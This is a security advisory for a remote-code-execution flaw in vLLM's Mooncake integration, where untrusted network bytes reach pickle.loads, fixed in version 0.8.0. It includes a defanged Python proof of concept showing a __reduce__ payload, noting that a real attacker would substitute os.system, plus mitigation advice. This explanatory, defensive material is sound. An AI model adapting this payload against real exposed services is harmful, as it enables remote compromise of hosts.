vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP on all network interfaces allows attackers to execute remote code on distributed hosts. This is a remote code execution vulnerability impacting any deployment that uses Mooncake to distribute KV cache across hosts. This vulnerability is fixed in version 0.8.0.
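The underlying flaw is the classic unsafe-deserialization pattern: bytes received from an untrusted network peer are handed to `pickle.loads`, which can invoke arbitrary callables during reconstruction. A minimal sketch of the attack class follows; this is illustrative only (the `Exploit` class and the harmless `eval` payload are stand-ins, not vLLM's or Mooncake's actual code, and a real attacker would call `os.system` or similar):

```python
import pickle

# Attacker side: craft a payload whose unpickling calls an arbitrary
# callable. __reduce__ tells pickle "reconstruct me by calling this
# function with these arguments".
class Exploit:
    def __reduce__(self):
        # A real attacker would return (os.system, ("...",)); evaluating
        # a harmless expression keeps this demo observable and safe.
        return (eval, ("40 + 2",))

malicious_bytes = pickle.dumps(Exploit())

# Victim side: the vulnerable pattern, i.e. calling pickle.loads on
# bytes that arrived over an exposed ZMQ/TCP socket. The payload only
# references builtins.eval plus a string, so the victim does not need
# the Exploit class at all; loading it executes the attacker's callable.
result = pickle.loads(malicious_bytes)
print(result)  # attacker-controlled code has already run at this point
```

The general mitigation is to never deserialize untrusted input with pickle: schema-constrained formats such as JSON or msgpack cannot encode callables, and binding the socket to trusted interfaces reduces exposure.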
https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
https://github.com/vllm-project/vllm/pull/14228
https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2